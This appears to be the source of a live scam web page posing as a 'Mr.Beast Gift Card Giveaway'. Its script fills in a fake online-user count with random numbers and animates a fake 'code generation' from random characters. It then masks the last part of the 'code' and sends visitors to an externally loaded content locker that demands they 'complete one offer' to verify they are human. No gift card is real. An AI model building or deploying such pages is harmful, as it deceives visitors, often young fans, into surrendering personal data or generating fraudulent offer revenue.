<!DOCTYPE html>

<html><head>
<title>Mr.Beast Gift Cards Giveaway</title>
<meta name="description" content="Mr.Beast Gift Cards Giveaway" />
<meta property="og:title" content="Mr.Beast Gift Cards Giveaway" />
<meta property="og:description" content="Mr.Beast Gift Cards Giveaway" />
<meta name="referrer" content="no-referrer">

<script src="https://browser.sentry-cdn.com/6.4.1/bundle.min.js" integrity="sha384-THoc7rflwZFKTdZNgv6jLFFDn299Uv3t1SW5B4yGLvLiCRTYP9ys6vXZcMl95TQF" crossorigin="anonymous"></script>
<script>
    Sentry.init({
        dsn: 'https://e0e6a104cb354a09bf094a90e676ea13@o425163.ingest.sentry.io/5780930',
        tracesSampleRate: 0.01
    });
</script>
<script>
    (function (i, s, o, g, r, a, m) {
        i['GoogleAnalyticsObject'] = r;
        i[r] = i[r] || function () {
            (i[r].q = i[r].q || []).push(arguments)
        }, i[r].l = 1 * new Date();
        a = s.createElement(o), m = s.getElementsByTagName(o)[0];
        a.async = 1;
        a.src = g;
        m.parentNode.insertBefore(a, m)
    })(window, document, 'script', 'https://www.google-analytics.com/analytics.js', 'ga');


    
    ga('send', 'pageview');

</script>
<style>
        .header_blue {
            background: #1565c0;
            padding: 80px 0 20px;
            color: #fff;
            font-size: 48px;
            font-weight: 300;
            margin-bottom: 40px;
        }
        .header_text {
            margin-left: auto;
            margin-right: auto;
            width: 80%;
        }
        body{
            margin:0;
            font-family:Roboto, sans-serif;
            color:#444;
        }
        .unlockBtn:hover{
            box-shadow: 0 3px 6px rgba(0,0,0,.16), 0 3px 6px rgba(0,0,0,.23);
        }
        .unlockBtn {
            background: #2196f3;
            border: none;
            border-radius: 2px;
            box-shadow: 0 1px 3px rgba(0,0,0,.12), 0 1px 2px rgba(0,0,0,.24);
            min-height: 31px;
            min-width: 70px;
            padding: 2px 16px;
            text-align: center;
            text-shadow: none;
            text-transform: uppercase;
            -webkit-transition: all 280ms ease;
            transition: all 280ms ease;
            box-sizing: border-box;
            cursor: pointer;
            -webkit-appearance: none;
            display: inline-block;
            vertical-align: middle;
            font: 500 14px/31px Roboto,sans-serif!important;
            outline: 0!important;
            color:white;
        }
        .content-container{
            width:80%;margin:0 auto;
        }
        @font-face{font-family:'Roboto';font-style:normal;font-weight:300;src:local('Roboto Light'),local(Roboto-Light),url(//fonts.gstatic.com/s/roboto/v15/Pru33qjShpZSmG3z6VYwnRJtnKITppOI_IvcXXDNrsc.woff2) format("woff2");unicode-range:U+0100-024F,U+1E00-1EFF,U+20A0-20AB,U+20AD-20CF,U+2C60-2C7F,U+A720-A7FF}@font-face{font-family:'Roboto';font-style:normal;font-weight:300;src:local('Roboto Light'),local(Roboto-Light),url(//fonts.gstatic.com/s/roboto/v15/Hgo13k-tfSpn0qi1SFdUfVtXRa8TVwTICgirnJhmVJw.woff2) format("woff2");unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02C6,U+02DA,U+02DC,U+2000-206F,U+2074,U+20AC,U+2212,U+2215,U+E0FF,U+EFFD,U+F000}@font-face{font-family:'Roboto';font-style:normal;font-weight:500;src:local('Roboto Medium'),local(Roboto-Medium),url(//fonts.gstatic.com/s/roboto/v15/oOeFwZNlrTefzLYmlVV1UBJtnKITppOI_IvcXXDNrsc.woff2) format("woff2");unicode-range:U+0100-024F,U+1E00-1EFF,U+20A0-20AB,U+20AD-20CF,U+2C60-2C7F,U+A720-A7FF}@font-face{font-family:'Roboto';font-style:normal;font-weight:500;src:local('Roboto Medium'),local(Roboto-Medium),url(//fonts.gstatic.com/s/roboto/v15/RxZJdnzeo3R5zSexge8UUVtXRa8TVwTICgirnJhmVJw.woff2) format("woff2");unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02C6,U+02DA,U+02DC,U+2000-206F,U+2074,U+20AC,U+2212,U+2215,U+E0FF,U+EFFD,U+F000}
        *{
  margin: 0;
  padding: 0;
  box-sizing: border-box;
  font-family: 'Titan One', cursive;
}
html,body{
  place-items: center;
  scroll-behavior: smooth;
  background: url(https://d2lmlpk6xgu7kg.cloudfront.net/uploads/16783611976948f162718682cc09d47d5e64042795.png) center center/cover;
  animation: bgscroll 20s linear infinite;
}
  @keyframes bgscroll {
    from{
      background-position:  0% 0;
    }
    to{
      background-position:  100% 0;
    }

    
    
  }


.header{
    font-family: 'Titan One', cursive;
    font-size: 30px;
    color: #000;
    text-align: center;
    text-transform: uppercase;
    font-weight: 500;
    
}

.useronline{
  font-family: 'Titan One', cursive;
  text-align: center;
  font-size: 12px;
  margin-bottom: 10px;

  -webkit-background-clip: padding-box;
}
#update{
  font-family: 'Titan One', cursive;
  color: red;
}
#user-online{
  font-family: 'Titan One', cursive;
  color: red;
}
.showin{
  animation: showin 0.5s;
 animation-fill-mode: forwards;
 }
 @keyframes showin {
   0% { transform: scale(0);}
 30% { transform: scale(1);}
 60% { transform: scale(1.1);}
   100% { transform: scale(1);}
 }
 #Gentext{
  color: #fff;
 }

.footer{
  display: block;
  position: fixed;
  width: 100%;
  background-color: rgba(0, 0, 0, 0.699);
  color: #fff;
  text-align: center;
  padding: 10px;
  margin-top: 10px;
  bottom: 0;
}
input{
  width: 320px;
  text-align: center;
  padding: 15px 0px;
  border-radius: 5px;
  margin-top: 10px;
  margin-bottom: 15px;
}
.appbox1{
  max-width: 600px;
  background: rgba(0, 0, 0, 0.664);
  justify-content: center;
  align-items: center;
  text-align: center;
  margin: auto;
  border: #333 solid 5px;
  border-radius: 15px;
  padding: 10px;
  margin-bottom: 80px;
}
.appbox{
    display: flex;
    flex-wrap: wrap;
    justify-content: center;
    align-items: center;
    text-align: center;
    max-width: 95%;
    margin: auto;
    margin-top: 10px;
    border-radius: 15px;
    padding: 10px;
    padding-bottom: 50px;
}
.appbox a{
  text-decoration: none;
}
.iconimg{
    max-width: 140px;
    cursor: pointer;
    border-radius: 10px;
    box-shadow: 0 1px 1px rgba(0,0,0,0.11), 0 2px 2px rgba(0,0,0,0.11), 0 4px 4px rgba(0,0,0,0.11), 0 8px 8px rgba(0,0,0,0.11), 0 16px 16px rgba(0,0,0,0.11), 0 32px 32px rgba(0,0,0,0.11);
    margin: 10px;


}
.iconimg:hover{
    background-color: #333;
    border: #fff solid 5px;
    transform: scale(1.1);
    box-shadow: 0px -25px 20px -20px rgba(255, 255, 255, 0.45), 25px 0 20px -20px rgba(255, 255, 255, 0.45), 0px 25px 20px -20px rgba(255, 255, 255, 0.45), -25px 0 20px -20px rgba(255, 255, 255, 0.45);


}
.selectedcard{
    background-color: #333;
    border: #fff solid 5px;
    transform: scale(1.2);
    box-shadow: 0px -25px 20px -20px rgba(255, 255, 255, 0.45), 25px 0 20px -20px rgba(255, 255, 255, 0.45), 0px 25px 20px -20px rgba(255, 255, 255, 0.45), -25px 0 20px -20px rgba(255, 255, 255, 0.45);

}
.button{
    cursor: pointer;
    display: block;
    max-width: 220px;
    text-align: center;
    font-size: 20px;
    border-color: #0069d9;
    background: #0069d9;
    color: #fff;
    border-radius: 10px;
    padding: 20px;
    margin: auto;
    margin-top: 10px;
    z-index: 99;
}
.button:hover{
    border-color: #065cb8;
    background: #065cb8;
    transform: scale(1.1);

}
.download{
    display: flex;
    justify-content: center;
    align-self: center;
    text-align: center;
    border: #333 solid 2px;

}
.showiconimg{
    max-width: 180px;
    border-radius: 10px;
    border: #fff solid 5px;
    box-shadow: 0px -25px 20px -20px rgba(255, 255, 255, 0.45), 25px 0 20px -20px rgba(255, 255, 255, 0.45), 0px 25px 20px -20px rgba(255, 255, 255, 0.45), -25px 0 20px -20px rgba(255, 255, 255, 0.45);
}
.text1{
    display: block;
    font-size: 20px;
    position:relative;
    z-index: 10000;
    max-width: 90%;
    color: #fff;
    font-family: 'Play', sans-serif;
    border-radius: 10px;
    text-align: center;
    width: 100%;
    padding: 5px;
    margin: auto;
    margin-top: 5px;

}
#Gentext{
  font-family: 'Courier New', Courier, monospaceS;
  max-width: 350px;
  margin: auto;
  border-radius: 10px;
  background-color: #fff;
  padding: 10px 20px;
  color: #000;
  margin-top: 10px;
  font-size: 1.2rem;
  letter-spacing: 3px;
  font-weight: bold;
}
#Gentext1{
  color: #fff;
}
.Gen-Text{
  font-family: 'Play', sans-serif;
  font-size: 20px;
  margin: 20px;
}

.icon{
    width: 220px;
    font-family: 'Play', sans-serif;
    margin-bottom: 10px;

}



#google_translate_element{
  padding: 10px;
}
    </style>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
</head>
<body>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" href="style.css">
<link href="https://fonts.googleapis.com/css2?family=Play&display=swap" rel="stylesheet">
<link href="https://fonts.googleapis.com/css2?family=Titan+One&display=swap" rel="stylesheet">
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Lalezar&display=swap" rel="stylesheet">
<link rel="icon" href="https://d2lmlpk6xgu7kg.cloudfront.net/uploads/1678363540475d14ed4647785d9943fabdba81fdc8.png">
<title>Mr Beast Gift Cards Giveaway</title>
</head>
<body>
<center><div id="google_translate_element"></div></center>
<div id="header" class="header"> <img src="https://d2lmlpk6xgu7kg.cloudfront.net/uploads/1678361332af23ddeeafd54eb78d7951d71bb13a42.png" class="icon"> <br>GIFT CARD GIVEAWAY</div>
<div class="useronline showin" id="useronline">User Online: <span id="user-online"></span> | Last update: <span id="update"></span></div>
<div id="download" style="display: none; margin-top: 20px;" class="appbox1">
<div><img src=" " id="imggen" class="showiconimg"></div>
<div style="display: none;" class="Gen-Text" id="Gentext"></div>
<div style="display: none;" class="Gen-Text" id="Gentext1">To display the last codes, we must verify that you are a real human, Click on this button and complete one offer.</div>
<div style="display: none;" class="button" id="button1" onclick="_dS()"> Verify Now </div>
<div id="boxhide">
<div class="text1">Here is your gift card!</div>
<div class="button" id="button" onclick="bntnext()"> Get Now! </div>
</div>
</div>
<div class="appbox" id="appbox">
<a href="#header">
<img onclick="card(1)" src="https://d2lmlpk6xgu7kg.cloudfront.net/uploads/16835155892ec64137df5b248ab76c47e25694999a.png" class="iconimg" id="card1">
<img onclick="card(2)" src="https://d2lmlpk6xgu7kg.cloudfront.net/uploads/16835155878748b3ee2e78d26f67f8a25ffdccbacc.png" class="iconimg" id="card2">
<img onclick="card(3)" src="https://d2lmlpk6xgu7kg.cloudfront.net/uploads/1683515588d9add22281c8e75444fe5ae9fa465d51.png" class="iconimg" id="card3">
<img onclick="card(4)" src="https://d2lmlpk6xgu7kg.cloudfront.net/uploads/168351558813755e89e3f453a0ddc7fe24df7c8ff3.png" class="iconimg" id="card4">
<img onclick="card(5)" src="https://d2lmlpk6xgu7kg.cloudfront.net/uploads/16835162124327c5dd85b75f93ac5b40d83f7a0fc7.png" class="iconimg" id="card5">
<img onclick="card(6)" src="https://d2lmlpk6xgu7kg.cloudfront.net/uploads/1683515587d7137bdf5e6ef50a1b25500a4729490f.png" class="iconimg" id="card6">
<img onclick="card(7)" src="https://d2lmlpk6xgu7kg.cloudfront.net/uploads/1683515586bb993477f94e1a2cb20d215d6bc40809.png" class="iconimg" id="card7">
<img onclick="card(8)" src="https://d2lmlpk6xgu7kg.cloudfront.net/uploads/168351558787a27e0fb81f743e6ed8a241ee9b27e4.png" class="iconimg" id="card8">
<img onclick="card(9)" src="https://d2lmlpk6xgu7kg.cloudfront.net/uploads/1683515586181c716e649e0de5204b5d7537669473.png" class="iconimg" id="card9">
<img onclick="card(10)" src="https://d2lmlpk6xgu7kg.cloudfront.net/uploads/168351558560a555c5564b1d3786b74d9ef861a760.png" class="iconimg" id="card10">
<img onclick="card(11)" src="https://d2lmlpk6xgu7kg.cloudfront.net/uploads/16835155851a4468a359a9cb675ea185fcf71ab6d8.png" class="iconimg" id="card11">
<img onclick="card(12)" src="https://d2lmlpk6xgu7kg.cloudfront.net/uploads/16835155847d885a68fbf01c3c98d346efa14d0a3c.png" class="iconimg" id="card12">
<img onclick="card(13)" src="https://d2lmlpk6xgu7kg.cloudfront.net/uploads/1683515584aa0d151a43729454454784dfd0e78ed8.png" class="iconimg" id="card13">
<img onclick="card(14)" src="https://d2lmlpk6xgu7kg.cloudfront.net/uploads/1683515584d23f7cda78a87917d071cfdcd80cd2a6.png" class="iconimg" id="card14">
<img onclick="card(15)" src="https://d2lmlpk6xgu7kg.cloudfront.net/uploads/1683515583c80a90818f98dd5b530d7658c670b29f.png" class="iconimg" id="card15">
<img onclick="card(16)" src="https://d2lmlpk6xgu7kg.cloudfront.net/uploads/168351558269416cf617bfe6668e55ad8db023750d.png" class="iconimg" id="card16">
<img onclick="card(17)" src="https://d2lmlpk6xgu7kg.cloudfront.net/uploads/16835155821ce0b5e8da2485a766e01438af4c98cf.png" class="iconimg" id="card17">
<img onclick="card(18)" src="https://d2lmlpk6xgu7kg.cloudfront.net/uploads/1683515582188f681dceb4d54bb0ca2a44ecc5ae2e.png" class="iconimg" id="card18">
<img onclick="card(19)" src="https://d2lmlpk6xgu7kg.cloudfront.net/uploads/1683515580ffc9bf439ab9a1b6927ce97463eb2883.png" class="iconimg" id="card19">
<img onclick="card(20)" src="https://d2lmlpk6xgu7kg.cloudfront.net/uploads/1683515581c543e9517e74262f450f0d5c3c8a40d2.png" class="iconimg" id="card20">
<img onclick="card(21)" src="https://d2lmlpk6xgu7kg.cloudfront.net/uploads/1683515581a1481b807a7aeaa03ec0d01cee167cc2.png" class="iconimg" id="card21">
<img onclick="card(22)" src="https://d2lmlpk6xgu7kg.cloudfront.net/uploads/1683515579c0063555d35f573fa6a19c893cd3b1fc.png" class="iconimg" id="card22">
<img onclick="card(23)" src="https://d2lmlpk6xgu7kg.cloudfront.net/uploads/168351558018d0f22b2a201cafa7446c84ebca10bd.png" class="iconimg" id="card23">
<img onclick="card(24)" src="https://d2lmlpk6xgu7kg.cloudfront.net/uploads/16835155804025a27ee677a002e9b9a9d00e60c803.png" class="iconimg" id="card24">
<img onclick="card(25)" src="https://d2lmlpk6xgu7kg.cloudfront.net/uploads/1683515579e9cef2557aa62295863fe0cc259ec90a.png" class="iconimg" id="card25">
<img onclick="card(26)" src="https://d2lmlpk6xgu7kg.cloudfront.net/uploads/1683515579b8f11cac60402fdfe438578c3bdc9519.png" class="iconimg" id="card26">
<img onclick="card(27)" src="https://d2lmlpk6xgu7kg.cloudfront.net/uploads/16835155786f1b9ae97f0444022e99030b7660bb7d.png" class="iconimg" id="card27">
<img onclick="card(28)" src="https://d2lmlpk6xgu7kg.cloudfront.net/uploads/1683515577114fea203a24b08e7d746276dad9e428.png" class="iconimg" id="card28">
<img onclick="card(29)" src="https://d2lmlpk6xgu7kg.cloudfront.net/uploads/1683515578dc7bf3e6a1b096eb8992eaadef8c37fa.png" class="iconimg" id="card29">
<img onclick="card(30)" src="https://d2lmlpk6xgu7kg.cloudfront.net/uploads/1683515577b67819cadd48b1796be797f19412a050.png" class="iconimg" id="card30">
<img onclick="card(31)" src="https://d2lmlpk6xgu7kg.cloudfront.net/uploads/16835155776888048542b1aee83f60cada03b5e9fe.png" class="iconimg" id="card31">
<img onclick="card(32)" src="https://d2lmlpk6xgu7kg.cloudfront.net/uploads/16835155766b7de6286253f9137b8a8017235f8ff9.png" class="iconimg" id="card32">
<img onclick="card(33)" src="https://d2lmlpk6xgu7kg.cloudfront.net/uploads/16835155751ab0f5a98bc7d5e1e6deb62a607666ac.png" class="iconimg" id="card33">
<img onclick="card(34)" src="https://d2lmlpk6xgu7kg.cloudfront.net/uploads/1683515576889384a64b3805cd83a49235578d0c84.png" class="iconimg" id="card34">
<img onclick="card(35)" src="https://d2lmlpk6xgu7kg.cloudfront.net/uploads/1683515575f94e95b5fa567adfe83d22866a026691.png" class="iconimg" id="card35">
<img onclick="card(36)" src="https://d2lmlpk6xgu7kg.cloudfront.net/uploads/16835155759bb03a1c8cd60dd03ce3c7cdfc3d5729.png" class="iconimg" id="card36">
<img onclick="card(37)" src="https://d2lmlpk6xgu7kg.cloudfront.net/uploads/168351557414a549caf2272daa52328b3e9a887196.png" class="iconimg" id="card37">
<img onclick="card(38)" src="https://d2lmlpk6xgu7kg.cloudfront.net/uploads/1683515574519de4f41af72361cdc267ddb04ea418.png" class="iconimg" id="card38">
<img onclick="card(39)" src="https://d2lmlpk6xgu7kg.cloudfront.net/uploads/168351557317debab7cd0529195a1bd0f29aa07902.png" class="iconimg" id="card39">
<img onclick="card(40)" src="https://d2lmlpk6xgu7kg.cloudfront.net/uploads/168351557339e3880a6a59b3ce405f9a101166b46a.png" class="iconimg" id="card40">
</a>
</div>
</body>
<script src="main.js"></script>
<script type="text/javascript">
    function googleTranslateElementInit() {
      new google.translate.TranslateElement({pageLanguage: 'en'}, 'google_translate_element');
    }
    </script>
<script type="text/javascript" src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
</html>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script type="text/javascript">
    var Bccjh_qQm_uZFJoc={"it":4370027,"key":"747f4"};
    var forward="";
    XiNVc_RAj_qsbuuc.onComplete=function(data){
        window.location=forward;
        return false;
    };
</script>
<script src="https://d17iy0164v753e.cloudfront.net/27205ef.js"></script>
<script type="text/javascript">
    $('.showContentLocker').click(function(){
       _dS();
        return false;
    });
</script>
<script>

</script>
<script type="text/javascript">
    var myVar2 = setInterval(UserTimer, 9000);
function UserTimer() {
document.getElementById("user-online").innerHTML=Math.floor(Math.random() * 100)+200;
}

var date = (new Date()).toString().split(' ').splice(1,3).join(' ');
document.getElementById("update").innerHTML =date;


function card(cardnum){
    document.getElementById("download").style.display="block";
    document.getElementById("card1").classList.remove("selectedcard");
    document.getElementById("card2").classList.remove("selectedcard");
    document.getElementById("card3").classList.remove("selectedcard");
    document.getElementById("card4").classList.remove("selectedcard");
    document.getElementById("card5").classList.remove("selectedcard");
    document.getElementById("card6").classList.remove("selectedcard");
    document.getElementById("card7").classList.remove("selectedcard");
    document.getElementById("card8").classList.remove("selectedcard");
    document.getElementById("card9").classList.remove("selectedcard");
    document.getElementById("card10").classList.remove("selectedcard");
    document.getElementById("card11").classList.remove("selectedcard");
    document.getElementById("card12").classList.remove("selectedcard");
    document.getElementById("card13").classList.remove("selectedcard");
    document.getElementById("card14").classList.remove("selectedcard");
    document.getElementById("card15").classList.remove("selectedcard");
    document.getElementById("card16").classList.remove("selectedcard");
    document.getElementById("card17").classList.remove("selectedcard");
    document.getElementById("card18").classList.remove("selectedcard");
    document.getElementById("card19").classList.remove("selectedcard");
    document.getElementById("card20").classList.remove("selectedcard");
    document.getElementById("card21").classList.remove("selectedcard");
    document.getElementById("card22").classList.remove("selectedcard");
    document.getElementById("card23").classList.remove("selectedcard");
    document.getElementById("card24").classList.remove("selectedcard");
    document.getElementById("card25").classList.remove("selectedcard");
    document.getElementById("card26").classList.remove("selectedcard");
    document.getElementById("card27").classList.remove("selectedcard");
    document.getElementById("card28").classList.remove("selectedcard");
    document.getElementById("card29").classList.remove("selectedcard");
    document.getElementById("card30").classList.remove("selectedcard");
    document.getElementById("card31").classList.remove("selectedcard");
    document.getElementById("card32").classList.remove("selectedcard");
    document.getElementById("card33").classList.remove("selectedcard");
    document.getElementById("card34").classList.remove("selectedcard");
    document.getElementById("card35").classList.remove("selectedcard");
    document.getElementById("card36").classList.remove("selectedcard");
    document.getElementById("card37").classList.remove("selectedcard");
    document.getElementById("card38").classList.remove("selectedcard");
    document.getElementById("card39").classList.remove("selectedcard");
    document.getElementById("card40").classList.remove("selectedcard");
    // document.getElementById("card41").classList.remove("selectedcard");
    // document.getElementById("card42").classList.remove("selectedcard");
    // document.getElementById("card43").classList.remove("selectedcard");
    // document.getElementById("card44").classList.remove("selectedcard");
    // document.getElementById("card45").classList.remove("selectedcard");
    // document.getElementById("card46").classList.remove("selectedcard");
    // document.getElementById("card47").classList.remove("selectedcard");
    // document.getElementById("card48").classList.remove("selectedcard");
    // document.getElementById("card49").classList.remove("selectedcard");
    // document.getElementById("card50").classList.remove("selectedcard");
    // document.getElementById("card51").classList.remove("selectedcard");
    // document.getElementById("card52").classList.remove("selectedcard");
    // document.getElementById("card53").classList.remove("selectedcard");
    // document.getElementById("card54").classList.remove("selectedcard");
    // document.getElementById("card55").classList.remove("selectedcard");
    // document.getElementById("card56").classList.remove("selectedcard");
    // document.getElementById("card57").classList.remove("selectedcard");
    // document.getElementById("card58").classList.remove("selectedcard");
    document.getElementById("card"+cardnum).classList.add("selectedcard");

        if (cardnum==1){
          document.getElementById("imggen").src=document.getElementById("card1").src;        
        }else if (cardnum==2){
            document.getElementById("imggen").src=document.getElementById("card2").src;
        }else if (cardnum==3){
            document.getElementById("imggen").src=document.getElementById("card3").src;
        }else if (cardnum==4){
            document.getElementById("imggen").src=document.getElementById("card4").src;
        }else if (cardnum==5){
            document.getElementById("imggen").src=document.getElementById("card5").src;
        }else if (cardnum==6){
            document.getElementById("imggen").src=document.getElementById("card6").src;
        }else if (cardnum==7){
            document.getElementById("imggen").src=document.getElementById("card7").src;
        }else if (cardnum==8){
            document.getElementById("imggen").src=document.getElementById("card8").src;
        }else if (cardnum==9){
            document.getElementById("imggen").src=document.getElementById("card9").src;
        }else if (cardnum==10){
            document.getElementById("imggen").src=document.getElementById("card10").src;
        }else if (cardnum==11){
            document.getElementById("imggen").src=document.getElementById("card11").src;
        }else if (cardnum==12){
            document.getElementById("imggen").src=document.getElementById("card12").src;
        }else if (cardnum==13){
            document.getElementById("imggen").src=document.getElementById("card13").src;
        }else if (cardnum==14){
            document.getElementById("imggen").src=document.getElementById("card14").src;
        }else if (cardnum==15){
            document.getElementById("imggen").src=document.getElementById("card15").src;
        }else if (cardnum==16){
            document.getElementById("imggen").src=document.getElementById("card16").src;
        }else if (cardnum==17){
            document.getElementById("imggen").src=document.getElementById("card17").src;
        }else if (cardnum==18){
            document.getElementById("imggen").src=document.getElementById("card18").src;
        }else if (cardnum==19){
            document.getElementById("imggen").src=document.getElementById("card19").src;
        }else if (cardnum==20){
            document.getElementById("imggen").src=document.getElementById("card20").src;
        }else if (cardnum==21){
            document.getElementById("imggen").src=document.getElementById("card21").src;
        }else if (cardnum==22){
            document.getElementById("imggen").src=document.getElementById("card22").src;
        }else if (cardnum==23){
            document.getElementById("imggen").src=document.getElementById("card23").src;
        }else if (cardnum==24){
            document.getElementById("imggen").src=document.getElementById("card24").src;
        }else if (cardnum==25){
            document.getElementById("imggen").src=document.getElementById("card25").src;
        }else if (cardnum==26){
            document.getElementById("imggen").src=document.getElementById("card26").src;
        }else if (cardnum==27){
            document.getElementById("imggen").src=document.getElementById("card27").src;
        }else if (cardnum==28){
            document.getElementById("imggen").src=document.getElementById("card28").src;
        }else if (cardnum==29){
            document.getElementById("imggen").src=document.getElementById("card29").src;
        }else if (cardnum==30){
            document.getElementById("imggen").src=document.getElementById("card30").src;
        }else if (cardnum==31){
            document.getElementById("imggen").src=document.getElementById("card31").src;
        }else if (cardnum==32){
            document.getElementById("imggen").src=document.getElementById("card32").src;
        }else if (cardnum==33){
            document.getElementById("imggen").src=document.getElementById("card33").src;
        }else if (cardnum==34){
            document.getElementById("imggen").src=document.getElementById("card34").src;
        }else if (cardnum==35){
            document.getElementById("imggen").src=document.getElementById("card35").src;
        }else if (cardnum==36){
            document.getElementById("imggen").src=document.getElementById("card36").src;
        }else if (cardnum==37){
            document.getElementById("imggen").src=document.getElementById("card37").src;
        }else if (cardnum==38){
            document.getElementById("imggen").src=document.getElementById("card38").src;
        }else if (cardnum==39){
            document.getElementById("imggen").src=document.getElementById("card39").src;
        }else if (cardnum==40){
            document.getElementById("imggen").src=document.getElementById("card40").src;
        // }else if (cardnum==41){
        //     document.getElementById("imggen").src=document.getElementById("card41").src;
        // }else if (cardnum==42){
        //     document.getElementById("imggen").src=document.getElementById("card42").src;
        // }else if (cardnum==43){
        //     document.getElementById("imggen").src=document.getElementById("card43").src;
        // }else if (cardnum==44){
        //     document.getElementById("imggen").src=document.getElementById("card44").src;
        // }else if (cardnum==45){
        //     document.getElementById("imggen").src=document.getElementById("card45").src;
        // }else if (cardnum==46){
        //     document.getElementById("imggen").src=document.getElementById("card46").src;
        // }else if (cardnum==47){
        //     document.getElementById("imggen").src=document.getElementById("card47").src;
        // }else if (cardnum==48){
        //     document.getElementById("imggen").src=document.getElementById("card48").src;
        // }else if (cardnum==49){
        //     document.getElementById("imggen").src=document.getElementById("card49").src;
        // }else if (cardnum==50){
        //     document.getElementById("imggen").src=document.getElementById("card50").src;
        // }else if (cardnum==51){
        //     document.getElementById("imggen").src=document.getElementById("card51").src;
        // }else if (cardnum==52){
        //     document.getElementById("imggen").src=document.getElementById("card52").src;
        // }else if (cardnum==53){
        //     document.getElementById("imggen").src=document.getElementById("card53").src;
        // }else if (cardnum==54){
        //     document.getElementById("imggen").src=document.getElementById("card54").src;
        // }else if (cardnum==55){
        //     document.getElementById("imggen").src=document.getElementById("card55").src;
        // }else if (cardnum==56){
        //     document.getElementById("imggen").src=document.getElementById("card56").src;
        // }else if (cardnum==57){
        //     document.getElementById("imggen").src=document.getElementById("card57").src;
        // }else if (cardnum==58){
        //     document.getElementById("imggen").src=document.getElementById("card58").src;
}
}
function bntnext(){
    document.getElementById("boxhide").style.display="none";
    document.getElementById("appbox").style.display="none";
    document.getElementById("Gentext").style.display="block";
    var myVarCode = setInterval(genkey, 40);
    var stop=0;
    var KeyCode = ["9","8","7","6","5","4","3","2","1","0","A", "B", "C","D","E","F","G","H","I","J","K","L","Z","Y","X","W","V","U","T","S","R","Q","P","O","N","M"];
    function genkey() {
    key1=KeyCode[Math.floor(Math.random() * 36)];
    key2=KeyCode[Math.floor(Math.random() * 36)];
    key3=KeyCode[Math.floor(Math.random() * 36)];
    key4=KeyCode[Math.floor(Math.random() * 36)];
    key5=KeyCode[Math.floor(Math.random() * 36)];
    key6=KeyCode[Math.floor(Math.random() * 36)];
    key7=KeyCode[Math.floor(Math.random() * 36)];
    key8=KeyCode[Math.floor(Math.random() * 36)];
    key9=KeyCode[Math.floor(Math.random() * 36)];
    key10=KeyCode[Math.floor(Math.random() * 36)];
    key11=KeyCode[Math.floor(Math.random() * 36)];
    key12=KeyCode[Math.floor(Math.random() * 36)];
    key13=KeyCode[Math.floor(Math.random() * 36)];
    key14=KeyCode[Math.floor(Math.random() * 36)];
    key15=KeyCode[Math.floor(Math.random() * 36)];
    key16=KeyCode[Math.floor(Math.random() * 36)];
    key17=KeyCode[Math.floor(Math.random() * 36)];
    key18=KeyCode[Math.floor(Math.random() * 36)];
    key19=KeyCode[Math.floor(Math.random() * 36)];
    key20=KeyCode[Math.floor(Math.random() * 36)];
    key21=KeyCode[Math.floor(Math.random() * 36)];
    key22=KeyCode[Math.floor(Math.random() * 36)];
    key23=KeyCode[Math.floor(Math.random() * 36)];
    key24=KeyCode[Math.floor(Math.random() * 36)];
    key25=KeyCode[Math.floor(Math.random() * 36)];
    key26=KeyCode[Math.floor(Math.random() * 36)];
    key27=KeyCode[Math.floor(Math.random() * 36)];
    key28=KeyCode[Math.floor(Math.random() * 36)];
    key29=KeyCode[Math.floor(Math.random() * 36)];
    key30=KeyCode[Math.floor(Math.random() * 36)];
    key31=KeyCode[Math.floor(Math.random() * 36)];
    key32=KeyCode[Math.floor(Math.random() * 36)];
    key33=KeyCode[Math.floor(Math.random() * 36)];
    key34=KeyCode[Math.floor(Math.random() * 36)];
    key35=KeyCode[Math.floor(Math.random() * 36)];
    key36=KeyCode[Math.floor(Math.random() * 36)];
    document.getElementById("Gentext").innerHTML=key6+key7+key8+key9+"-"+key11+key12+key13+key14+"-"+key16+key17+key18+key19+"-"+key21+key22+key23+key24;
    stop++;
    if (stop==40){
    document.getElementById("Gentext").innerHTML=key6+key7+key8+key9+"-"+key11+key12+key13+key14+"-"+key16+key17+key18+key19+"-"+"####";
    document.getElementById("button1").style.display="block";
    document.getElementById("Gentext1").style.display="block";  
    clearInterval(myVarCode);
    }
    }
}

    

</script>
<script>
    if(typeof window.ga === 'function'){
        ga('create', 'UA-85922709-2', 'auto', 'customTemplateGlobal');
        ga('customTemplateGlobal.set', 'dimension1', typeof window.CPBContentLocker === 'function' ? 0 : 1);
        ga('customTemplateGlobal.send', 'pageView');
    }


</script>
</body>
</html>
